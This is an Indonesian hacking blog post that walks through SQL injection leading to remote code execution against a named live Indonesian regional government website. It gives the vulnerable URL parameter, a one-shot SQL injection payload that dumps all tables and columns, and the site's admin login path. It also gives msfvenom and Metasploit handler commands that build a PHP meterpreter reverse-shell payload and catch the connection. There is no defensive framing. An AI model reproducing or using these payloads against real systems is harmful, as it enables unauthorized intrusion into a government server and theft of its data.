SQL Injection to RCE With Metasploit

YO what up bro.
di artikel kali ini saya akan share SQL Injection to RCE With Metasploit

vendor => http://skpd.pacitankab.go.id/home.php?idskpd=41

Dios => (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

admin login => skpd.pacitankab.go.id/aadmin

command buat bikin payload :

msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > namafile.php

command buat setting metasploit:

Baca Juga


use exploit/multi/handler
set LHOST IP
set LPORT PORT
set payload php/meterpreter/reverse_tcp
exploit
untuk tutorialnya kalian bisa tonton video saya di bawah:


oke sekian artikel kali ini dan sampai bertemu di artikel selanjutnya.

Artikel Terkait

Belum ada Komentar untuk "SQL Injection to RCE With Metasploit"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel